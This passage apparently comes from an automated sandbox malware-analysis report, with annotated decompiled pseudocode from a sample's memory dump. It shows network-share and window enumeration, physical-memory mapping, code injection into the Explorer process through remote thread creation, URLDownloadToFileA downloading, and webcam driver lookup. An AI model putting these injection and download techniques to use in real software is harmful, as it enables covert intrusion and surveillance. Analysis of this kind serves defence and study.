                                    • Opcode ID: e57e4693100bc3df1c1c744bc845f6993cdae99d8f2113ad77336bcd28f6d825
                                    • Instruction ID: 8ad574ea02d0bdfe3b501ab4681b3dc418f98a11658dae951fca0ffa6e31001a
                                    • Opcode Fuzzy Hash: e57e4693100bc3df1c1c744bc845f6993cdae99d8f2113ad77336bcd28f6d825
                                    • Instruction Fuzzy Hash: FAB1FB7094050DABEF11DBA4C880EDEBBBAFF54304F208565E548B7298DA70AE85CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			// Recursive network-resource enumeration over the WNet API (MPR): lists remote names of a
                                    			// selected resource type and descends into every container resource.
                                    			E240406F0(void* __eax, void* __ebx, intOrPtr* __ecx, struct _NETRESOURCE* __edx, void* __edi, void* __esi) {
                                    				struct _NETRESOURCE* _v8;
                                    				void* _v12;          // HANDLE from WNetOpenEnumA
                                    				int _v16;            // lpcCount for WNetEnumResourceA
                                    				int _v20;            // lpBufferSize
                                    				char _v16432;        // dwType of the first NETRESOURCEA in the buffer (buffer starts at _v16436)
                                    				void _v16436;        // 0x4020-byte NETRESOURCEA array filled by WNetEnumResourceA
                                    				char _v16440;        // string locals (Delphi AnsiString)
                                    				char _v16444;
                                    				char _v16448;
                                    				char _v16452;        // result of the recursive call
                                    				void* _t35;
                                    				signed int _t51;
                                    				signed int* _t72;
                                    				intOrPtr _t80;
                                    				intOrPtr _t83;
                                    				intOrPtr* _t93;
                                    				signed int _t96;
                                    				signed int _t97;
                                    				void* _t99;
                                    				void* _t100;
                                    				intOrPtr _t101;
                                    
                                    				_t99 = _t100;
                                    				_push(__eax);
                                    				_t35 = 4;
                                    				do {                                   // Delphi stack probe: reserve and touch four 4 KB pages (16 KB) for the buffer
                                    					_t100 = _t100 + 0xfffff004;
                                    					_push(_t35);
                                    					_t35 = _t35 - 1;
                                    				} while (_t35 != 0);
                                    				_t101 = _t100 + 0xffffffc4;
                                    				_v16452 = 0;                           // string locals start as nil
                                    				_v16448 = 0;
                                    				_v16444 = 0;
                                    				_v16440 = 0;
                                    				_t93 = __ecx;                          // ecx: pointer to the caller's result string
                                    				_v8 = __edx;
                                    				_push(_t99);
                                    				_push(0x240408d9);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t101;                    // Delphi try/finally frame
                                    				E24013088(__ecx);                      // clear the result string
                                    				// dwScope 2 = RESOURCE_GLOBALNET, dwType 0 = RESOURCETYPE_ANY, dwUsage 0. Note that _v8 is used
                                    				// here as lpNetResource and below as the 0/1/2 type selector: the decompiler (quality 59%) has
                                    				// merged two incoming values into one slot.
                                    				if(WNetOpenEnumA(2, 0, 0, _v8,  &_v12) != 0) {
                                    					__eflags = 0;
                                    					_pop(_t80);
                                    					 *[fs:eax] = _t80;
                                    					_push(0x240408e0);
                                    					return E240130AC( &_v16452, 4);       // finalize the four string locals and return
                                    				} else {
                                    					_push(_t99);
                                    					_push(0x240408b4);
                                    					_push( *[fs:edx]);
                                    					 *[fs:edx] = _t101;                // nested try/finally so WNetCloseEnum always runs
                                    					_v16 = 0xffffffff;                 // lpcCount = -1: as many entries as fit
                                    					_v20 = 0x4020;                     // 16416-byte buffer = 513 NETRESOURCEA records of 32 bytes
                                    					while(WNetEnumResourceA(_v12,  &_v16,  &_v16436,  &_v20) == 0) {   // loop until no more entries (NO_ERROR returned while data remains)
                                    						_t96 = _v16 - 1;               // entries returned in this batch
                                    						__eflags = _t96;
                                    						if(_t96 >= 0) {
                                    							_t97 = _t96 + 1;
                                    							__eflags = _t97;
                                    							_t72 =  &_v16432;              // -> dwType of record 0; so *_t72 = dwType, _t72[2] = dwUsage, _t72[4] = lpRemoteName
                                    							do {
                                    								_t51 = _v8 - 1;            // type selector: 0, 1 or 2
                                    								__eflags = _t51;
                                    								if(__eflags < 0) {         // selector 0: keep entries with dwType == RESOURCETYPE_ANY (0)
                                    									__eflags =  *_t72;
                                    									if( *_t72 == 0) {
                                    										_push( *_t93);                       // result so far
                                    										E24013274( &_v16440, _t72[4]);       // lpRemoteName -> Delphi string
                                    										_push(_v16440);
                                    										_push(0x240408f0);                   // separator constant
                                    										_push(0x240408fc);                   // per-type tag constant (contents not recovered in the report)
                                    										_push(0x240408f0);
                                    										E240133FC();                         // result := result + name + sep + tag + sep
                                    									}
                                    								} else {
                                    									if(__eflags == 0) {        // selector 1: dwType == RESOURCETYPE_DISK (1)
                                    										__eflags =  *_t72 - 1;
                                    										if( *_t72 == 1) {
                                    											_push( *_t93);
                                    											E24013274( &_v16444, _t72[4]);
                                    											_push(_v16444);
                                    											_push(0x240408f0);
                                    											_push(0x24040908);                   // per-type tag constant
                                    											_push(0x240408f0);
                                    											E240133FC();
                                    										}
                                    									} else {
                                    										__eflags = _t51 == 1;
                                    										if(_t51 == 1) {            // selector 2: dwType == RESOURCETYPE_PRINT (2)
                                    											__eflags =  *_t72 - 2;
                                    											if( *_t72 == 2) {
                                    												_push( *_t93);
                                    												E24013274( &_v16448, _t72[4]);
                                    												_push(_v16448);
                                    												_push(0x240408f0);
                                    												_push(0x24040914);                   // per-type tag constant
                                    												_push(0x240408f0);
                                    												E240133FC();
                                    											}
                                    										}
                                    									}
                                    								}
                                    								__eflags = _t72[2] & 0x00000002;   // dwUsage & RESOURCEUSAGE_CONTAINER
                                    								if((_t72[2] & 0x00000002) > 0) {
                                    									// Recurse into the container (_t72 - 4 = &NETRESOURCEA) with selector 1 in the decompiler's
                                    									// argument order; there is no depth or cycle guard.
                                    									E240406F0(_t72 - 4, _t72,  &_v16452, 1, _t93, _t97);
                                    									E24013344(_t93, _v16452);          // append the child listing to the result
                                    								}
                                    								_t72 =  &(_t72[8]);                // next record: 8 DWORDs = sizeof(NETRESOURCEA) on 32-bit
                                    								_t97 = _t97 - 1;
                                    								__eflags = _t97;
                                    							} while (_t97 != 0);
                                    						}
                                    					}
                                    					_pop(_t83);
                                    					 *[fs:eax] = _t83;
                                    					_push(0x240408bb);
                                    					return WNetCloseEnum(_v12);        // finally block
                                    				}
                                    			}
                                    • Instruction addresses (the report's per-statement side column): 0x240406f1 .. 0x240408d8

                                    APIs
                                    • WNetOpenEnumA.MPR(00000002,00000000,00000000,?,?), ref: 2404074D
                                    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,00004020), ref: 24040890
                                    • WNetCloseEnum.MPR(?), ref: 240408AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Enum$CloseOpenResource
                                    • String ID: @
                                    • API String ID: 1269649575-2726393805
                                    • Opcode ID: 1ce61c0284aa5572a2b3cb395a753048e69c820855dbf928b35c69ab33d4b85b
                                    • Instruction ID: c9663ee355b49cf1c2293fbe22f7a4e3f628249a96f0d81c6c22571bac840af8
                                    • Opcode Fuzzy Hash: 1ce61c0284aa5572a2b3cb395a753048e69c820855dbf928b35c69ab33d4b85b
                                    • Instruction Fuzzy Hash: 2E419EB1E00219AFEF119F55CD80F8ABBB9FB54324F1040B9EB48B7248D6749BC08E95
                                    Uniqueness

                                    Uniqueness Score: -1.00%
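The recursive WNet enumeration above is easier to read against a model of the NETRESOURCEA buffer it walks. The following Python is an added example, not code from the sample or from the report: it does not call the Win32 API, but parses constructed NETRESOURCEA records (fake pointers, constructed share names) with the same 32-byte layout the listing steps through, applies the listing's dwType selector (0/1/2) and recurses into containers with selector 1, as the decompiled recursive call does. The tag labels "ANY"/"DISK"/"PRINT" and the "|" separator are assumptions; the report does not recover the real strings at 0x240408f0, 0x240408fc, 0x24040908 and 0x24040914. The depth guard is added here; the decompiled routine has none.

```python
"""Added model of the sample's share-enumeration loop (E240406F0): parses
NETRESOURCEA records from a constructed buffer instead of calling WNet APIs."""
import struct
from typing import Dict, List, Optional, Tuple

# NETRESOURCEA on 32-bit Windows: dwScope, dwType, dwDisplayType, dwUsage,
# lpLocalName, lpRemoteName, lpComment, lpProvider -> eight DWORDs, 32 bytes.
# In the listing _t72 points at dwType, so *_t72 = dwType, _t72[2] = dwUsage,
# _t72[4] = lpRemoteName and &_t72[8] is the next record.
NETRESOURCE_FMT = "<8I"
RECORD_SIZE = struct.calcsize(NETRESOURCE_FMT)  # 32

RESOURCETYPE_ANY, RESOURCETYPE_DISK, RESOURCETYPE_PRINT = 0, 1, 2
RESOURCEUSAGE_CONTAINER = 0x00000002
ENUM_BUFFER_SIZE = 0x4020  # the sample's WNetEnumResourceA buffer: 513 records

# Assumed labels for the per-type tag strings (0x240408fc / 0x24040908 /
# 0x24040914); the report does not recover their contents.
TYPE_TAG = {RESOURCETYPE_ANY: "ANY", RESOURCETYPE_DISK: "DISK",
            RESOURCETYPE_PRINT: "PRINT"}

# Constructed stand-in for process memory: fake LPSTR value -> string.
FAKE_STRINGS: Dict[int, str] = {
    0x00A01000: "\\\\CORP",
    0x00A01010: "\\\\CORP\\FILESRV",
    0x00A01020: "\\\\FILESRV\\public",
    0x00A01030: "\\\\FILESRV\\hp-printer",
}


def make_record(rtype: int, usage: int, remote_ptr: int) -> bytes:
    """Lay out one NETRESOURCEA as WNetEnumResourceA would (dwScope = RESOURCE_GLOBALNET)."""
    return struct.pack(NETRESOURCE_FMT, 2, rtype, 0, usage, 0, remote_ptr, 0, 0)


# Constructed enumeration results keyed by container remote name
# (None = the global root, i.e. lpNetResource == NULL).
FAKE_ENUM: Dict[Optional[str], bytes] = {
    None: make_record(RESOURCETYPE_ANY, RESOURCEUSAGE_CONTAINER, 0x00A01000),
    "\\\\CORP": make_record(RESOURCETYPE_ANY, RESOURCEUSAGE_CONTAINER, 0x00A01010),
    "\\\\CORP\\FILESRV": make_record(RESOURCETYPE_DISK, 0x1, 0x00A01020)
    + make_record(RESOURCETYPE_PRINT, 0x1, 0x00A01030),
}


def parse_records(buf: bytes, count: int) -> List[dict]:
    """Walk `count` records with the listing's 32-byte stride."""
    if len(buf) < count * RECORD_SIZE or len(buf) > ENUM_BUFFER_SIZE:
        raise ValueError("buffer/count mismatch")
    recs = []
    for i in range(count):
        f = struct.unpack_from(NETRESOURCE_FMT, buf, i * RECORD_SIZE)
        recs.append({"dwType": f[1], "dwUsage": f[3],
                     "lpRemoteName": FAKE_STRINGS.get(f[5], "")})
    return recs


def enum_like_sample(container: Optional[str], type_filter: int,
                     depth: int = 0, max_depth: int = 16) -> List[Tuple[str, str]]:
    """Mirror of the decompiled loop: emit lpRemoteName when dwType == selector,
    recurse into containers with selector RESOURCETYPE_DISK (the constant 1 in
    the recursive call). The depth guard is added here; the sample has none."""
    buf = FAKE_ENUM.get(container, b"")
    out: List[Tuple[str, str]] = []
    for rec in parse_records(buf, len(buf) // RECORD_SIZE):
        if rec["dwType"] == type_filter:
            out.append((rec["lpRemoteName"], TYPE_TAG[type_filter]))
        if rec["dwUsage"] & RESOURCEUSAGE_CONTAINER and depth < max_depth:
            out.extend(enum_like_sample(rec["lpRemoteName"], RESOURCETYPE_DISK,
                                        depth + 1, max_depth))
    return out


def format_like_sample(entries: List[Tuple[str, str]], sep: str = "|") -> str:
    """name + sep + tag + sep per entry, the push order before E240133FC.
    The real separator (0x240408f0) is not recovered; "|" is assumed."""
    return "".join(f"{name}{sep}{tag}{sep}" for name, tag in entries)


if __name__ == "__main__":
    for name, tag in enum_like_sample(None, RESOURCETYPE_ANY):
        print(f"{tag:5s} {name}")
```

Running the model with selector 0 at the root lists \\CORP (dwType 0, matched at the top level) and then only \\FILESRV\public from the nested containers: because the recursive call always passes selector 1, nested domains and servers are never emitted themselves and printers are never emitted below the root, which is why the listing's output is effectively a disk-share inventory whatever the caller asked for.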

                                    C-Code - Quality: 28%
                                    			// Window-enumeration callback (one HWND per call): appends the window's handle and title to a
                                    			// global list; windows that are not visible are prefixed with the marker "*@*@".
                                    			E24042A48(void* __ebx, struct HWND__* _a4) {
                                    				char _v8;            // window title (Delphi AnsiString)
                                    				char _v12;
                                    				char _v16;
                                    				int _t19;
                                    				int _t26;
                                    				struct HWND__* _t40;
                                    				void* _t43;
                                    				intOrPtr _t48;
                                    				intOrPtr _t56;
                                    
                                    				_push(0);            // three string locals start as nil
                                    				_push(0);
                                    				_push(0);
                                    				_t40 = _a4;
                                    				_push(_t56);
                                    				_push(0x24042b4d);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t56;   // Delphi try/finally frame
                                    				if(_t40 != 0) {
                                    					E240136BC( &_v8, 0xff);                                      // SetLength(title, 255)
                                    					_t19 = E2401333C(_v8);                                       // Length(title)
                                    					E240136BC( &_v8, GetWindowTextA(_t40, E24013534(_v8), _t19)); // GetWindowTextA(hwnd, PChar(title), 255), then shrink to the returned length
                                    					if(IsWindowVisible(_t40) == 0 || _v8 == 0) {                 // not a visible window with a title
                                    						_t26 = IsWindowVisible(_t40);
                                    						asm("sbb eax, eax");
                                    						if(_t26 + 1 == 0 && _v8 != 0) {                          // hidden window with a non-empty title (boolean test rendered as sbb/+1 by the decompiler)
                                    							_push( *0x240632e4);                                 // global accumulated window list
                                    							_push("*@*@");                                       // hidden-window marker
                                    							_push(_v8);                                          // title
                                    							_push(0x24042b68);                                   // separator constant
                                    							E240158BC( &_v16, _t43, 0, _t40, 0);                 // formats the HWND value as a string
                                    							_push(_v16);
                                    							_push(0x24042b68);
                                    							E240133FC();                                         // list := list + "*@*@" + title + sep + hwnd + sep
                                    						}
                                    					} else {                                                     // visible titled window: same record without the marker
                                    						_push( *0x240632e4);
                                    						_push(_v8);
                                    						_push(0x24042b68);
                                    						E240158BC( &_v12, _t43, 0, _t40, 0);
                                    						_push(_v12);
                                    						_push(0x24042b68);
                                    						E240133FC();                                             // list := list + title + sep + hwnd + sep
                                    					}
                                    				}
                                    				_pop(_t48);
                                    				 *[fs:eax] = _t48;                                               // end of try/finally
                                    				_push(0x24042b54);
                                    				return E240130AC( &_v16, 3);                                     // finalize the three string locals
                                    			}
                                    • Instruction addresses (the report's per-statement side column): 0x24042a4b .. 0x24042b4c

                                    APIs
                                    • GetWindowTextA.USER32(?,00000000,00000000), ref: 24042A8E
                                    • IsWindowVisible.USER32(?), ref: 24042A9E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Window$TextVisible
                                    • String ID: *@*@
                                    • API String ID: 1670992164-2280034366
                                    • Opcode ID: c45a5717a2f133e187bddf60decffecf5e201661517c01256e644db559c9fd8f
                                    • Instruction ID: 8a8c08a70dfa2e8decc0244ec7c24e2506ca714a89d2e5ccce12ab8d8d6c49c7
                                    • Opcode Fuzzy Hash: c45a5717a2f133e187bddf60decffecf5e201661517c01256e644db559c9fd8f
                                    • Instruction Fuzzy Hash: 35219D70B00205BBFF01DEA1CC90F9EB7ADEB68348F508079B905AA158DA75DFC4DA95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E240536D0() {
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				char _v36;
                                    				char _v48;
                                    				char _v60;
                                    				intOrPtr _t22;
                                    				void* _t23;
                                    				void* _t25;
                                    				void* _t30;
                                    				void* _t32;
                                    				long _t37;
                                    				intOrPtr _t38;
                                    
                                    				_t38 =  &_v32;
                                    				0x24063704->dwOSVersionInfoSize = 0x94;
                                    				GetVersionExA(0x24063704);
                                    				if( *0x24063708 == 5) {
                                    					__eflags =  *0x2406370c - 1;
                                    					if(__eflags < 0) {
                                    						_t37 = 0x30000;
                                    						L8:
                                    						 *0x2405aaac( &_v36, L"\\Device\\PhysicalMemory");
                                    						_v36 = 0x18;
                                    						_v32 = 0;
                                    						_v28 = _t38;
                                    						_v24 = 0;
                                    						_v20 = 0;
                                    						_v16 = 0;
                                    						_t22 =  *0x2405aab0(0x2405aabc, 6,  &_v36);
                                    						__eflags = _t22 - 0xc0000022;
                                    						if(_t22 == 0xc0000022) {
                                    							 *0x2405aab0(0x2405aabc, 0x60000,  &_v48);
                                    							_t30 =  *0x2405aabc; // 0x0
                                    							E240535C4(_t30);
                                    							_t32 =  *0x2405aabc; // 0x0
                                    							CloseHandle(_t32);
                                    							_t22 =  *0x2405aab0(0x2405aabc, 6,  &_v60);
                                    						}
                                    						__eflags = _t22;
                                    						if(_t22 >= 0) {
                                    							_t23 =  *0x2405aabc; // 0x0
                                    							 *0x2405aab8 = MapViewOfFile(_t23, 6, 0, _t37, 0x1000);
                                    							__eflags =  *0x2405aab8;
                                    							if( *0x2405aab8 != 0) {
                                    								_t25 =  *0x2405aabc; // 0x0
                                    								return _t25;
                                    							}
                                    							return 0;
                                    						}
                                    						return 0;
                                    					}
                                    					if(__eflags == 0) {
                                    						_t37 = 0x39000;
                                    						goto L8;
                                    					}
                                    					return 0;
                                    				}
                                    				return 0;
                                    			}

                                    APIs
                                    • GetVersionExA.KERNEL32(24063704), ref: 240536E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Version
                                    • String ID: \Device\PhysicalMemory
                                    • API String ID: 1889659487-2007344781
                                    • Opcode ID: f9afce1440229dc77ddab007eb147b6a452be40f934abc042d2375c706e0e78f
                                    • Instruction ID: 31f08a68bebc2b102270513c3743b15cdca4706c229416923a06d65bcb2daa85
                                    • Opcode Fuzzy Hash: f9afce1440229dc77ddab007eb147b6a452be40f934abc042d2375c706e0e78f
                                    • Instruction Fuzzy Hash: 1C21E1B1A14209AFE361CF79C984F4A7AD9FB48244F104839F506D7664D7BCD5C88F62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E2403B3FC(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				intOrPtr _t49;
                                    				void* _t55;
                                    
                                    				_v20 = 0;
                                    				_v16 = 0;
                                    				_push(_t55);
                                    				_push(0x2403b4ae);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t55 + 0xfffffff0;
                                    				E240115E0(0,  &_v16);
                                    				_t52 = E24013534(_v16);
                                    				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
                                    				_t37 = OpenProcess(0x1f0fff, 0, _v8);
                                    				E24013274( &_v20, _t17);
                                    				_v12 = E2403B308(_t22, E2401333C(_v20), _t52);
                                    				E2403B354(_t37, E2403B308(_t37, 4,  &_v12), E2403B2E0);
                                    				_pop(_t49);
                                    				 *[fs:eax] = _t49;
                                    				_push(0x2403b4b5);
                                    				return E240130AC( &_v20, 2);
                                    			}

                                    APIs
                                      • Part of subcall function 240115E0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000,00000000), ref: 24011604
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 2403B439
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 2403B43F
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,2403B4AE), ref: 2403B44F
                                      • Part of subcall function 2403B308: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 2403B320
                                      • Part of subcall function 2403B308: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 2403B331
                                      • Part of subcall function 2403B308: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 2403B33F
                                      • Part of subcall function 2403B354: GetModuleHandleA.KERNEL32(00000000), ref: 2403B36C
                                      • Part of subcall function 2403B354: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 2403B396
                                      • Part of subcall function 2403B354: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 2403B3A5
                                      • Part of subcall function 2403B354: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 2403B3B8
                                      • Part of subcall function 2403B354: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 2403B3C0
                                      • Part of subcall function 2403B354: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 2403B3E1
                                      • Part of subcall function 2403B354: CloseHandle.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 2403B3E7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: 393fb5f8634584fb9e86427e0323e598e0b3ec1d2f89986c1015fb721856fc72
                                    • Instruction ID: 6bf5e75614952cd0dc9ca3c9003167bd2cfedf8609bd1293714aecec320920e0
                                    • Opcode Fuzzy Hash: 393fb5f8634584fb9e86427e0323e598e0b3ec1d2f89986c1015fb721856fc72
                                    • Instruction Fuzzy Hash: 6611C671B00218AFEB01EBB4CC90BAEBBF8EF49208F504575E515E7349EA74DE408B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E240161A0(char __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _t12;
                                    				void* _t18;
                                    				intOrPtr _t27;
                                    				void* _t29;
                                    				void* _t30;
                                    				intOrPtr _t32;
                                    
                                    				_t29 = __ecx;
                                    				_t18 = __edx;
                                    				_v8 = __eax;
                                    				E24014A8C(_v8);
                                    				 *[fs:eax] = _t32;
                                    				_t12 = GetProcAddress(LoadLibraryA("urlmon.dll"), "URLDownloadToFileA");
                                    				 *_t12(_v8, _t18, _t29, _a8, _a4,  *[fs:eax], 0x24016200, _t32, __esi, __ebx, __ecx, _t30);
                                    				_pop(_t27);
                                    				 *[fs:eax] = _t27;
                                    				_push(E24016207);
                                    				return E24014A48( &_v8);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(urlmon.dll,URLDownloadToFileA,00000000,24016200,?,?,?,00000000,?,2403862A,00000000,00000000,00000000,2403867F,?,.tmp), ref: 240161CD
                                    • GetProcAddress.KERNEL32(00000000,urlmon.dll), ref: 240161D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: URLDownloadToFileA$urlmon.dll
                                    • API String ID: 2574300362-892269089
                                    • Opcode ID: e4c6e49eb9fafcdb7affa66ae8e8a6dde4751a6dc5894be42a4bb0265b42decb
                                    • Instruction ID: e07162667821156883db5b363881209dab75b607400cc71d2c787b667578c6eb
                                    • Opcode Fuzzy Hash: e4c6e49eb9fafcdb7affa66ae8e8a6dde4751a6dc5894be42a4bb0265b42decb
                                    • Instruction Fuzzy Hash: 78F09075604A04BFA701CBE6CC90D5E7BECEF8D6103918869F40CD3214D634AF408AA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E24020B6C(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr _v40;
                                    				char _v44;
                                    				void* _t19;
                                    				intOrPtr _t23;
                                    				intOrPtr _t25;
                                    				intOrPtr _t26;
                                    				void* _t31;
                                    
                                    				_t19 = __eax;
                                    				_t23 =  *0x2401f830; // 0x2401f834
                                    				E240139CC( &_v44, _t23);
                                    				_push(_t31);
                                    				_push(0x24020bd9);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t31 + 0xffffffd8;
                                    				 *0x24057124 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "GetProductInfo");
                                    				E2401F870( &_v44, _t19, __edi, __esi);
                                    				E240130DC(_t19, _v40);
                                    				_pop(_t25);
                                    				 *[fs:eax] = _t25;
                                    				_push(0x24020be0);
                                    				_t26 =  *0x2401f830; // 0x2401f834
                                    				return E24013A90( &_v44, _t26);
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,GetProductInfo,00000000,24020BD9), ref: 24020B9B
                                    • GetProcAddress.KERNEL32(00000000,KERNEL32.DLL), ref: 24020BA1
                                      • Part of subcall function 2401F870: GetVersionExW.KERNEL32(0000011C), ref: 2401F8DA
                                      • Part of subcall function 2401F870: GetVersionExW.KERNEL32(00000094,0000011C), ref: 2401F8F6
                                      • Part of subcall function 2401F870: GetSystemInfo.KERNEL32(?,0000011C), ref: 2401F95C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Version$AddressHandleInfoModuleProcSystem
                                    • String ID: GetProductInfo$KERNEL32.DLL
                                    • API String ID: 335284197-4189171773
                                    • Opcode ID: 4778341dd39cdc0ca0d4e746f4429cd8b0c515a30ad8d89b6d42cbe363fdf21c
                                    • Instruction ID: aa62a680170db7b19b039549c83a77f4792b4161eecb6727310b407adea659c8
                                    • Opcode Fuzzy Hash: 4778341dd39cdc0ca0d4e746f4429cd8b0c515a30ad8d89b6d42cbe363fdf21c
                                    • Instruction Fuzzy Hash: A5F096356146045FEB12DFA5CCA0D8E77E8FB596187900131E809B369CDA34ADC18EA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E24021904(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                    				_Unknown_base(*)()* _t5;
                                    				void* _t7;
                                    				void* _t12;
                                    				void* _t13;
                                    
                                    				_t12 = __ecx;
                                    				_t13 = __edx;
                                    				_t7 = __eax;
                                    				_t5 = GetProcAddress(LoadLibraryA("AVICAP32.dll"), "capGetDriverDescriptionA");
                                    				return  *_t5(_t7, _t13, _t12, _a8, _a4);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(AVICAP32.dll,capGetDriverDescriptionA), ref: 2402191A
                                    • GetProcAddress.KERNEL32(00000000,AVICAP32.dll), ref: 24021920
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: AVICAP32.dll$capGetDriverDescriptionA
                                    • API String ID: 2574300362-2465018903
                                    • Opcode ID: b7777b4aadb4f6028b8c85780a9cdfe0e4b1d64e7fd81efaa68bd6439109a5b2
                                    • Instruction ID: c1a5b6ee841e59ece0fcda65be3f0267a116aeb9b81956fcb4f5259b0698455e
                                    • Opcode Fuzzy Hash: b7777b4aadb4f6028b8c85780a9cdfe0e4b1d64e7fd81efaa68bd6439109a5b2
                                    • Instruction Fuzzy Hash: 35D0C2722005183B2311E5DB9C80C9BAB5CDFE55B03008026B50C9B109C4308E4082F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E24016E48(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
                                    				return  *_t3(_t5, _t7);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,24016F52,00000000,24016F93), ref: 24016E58
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 24016E5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
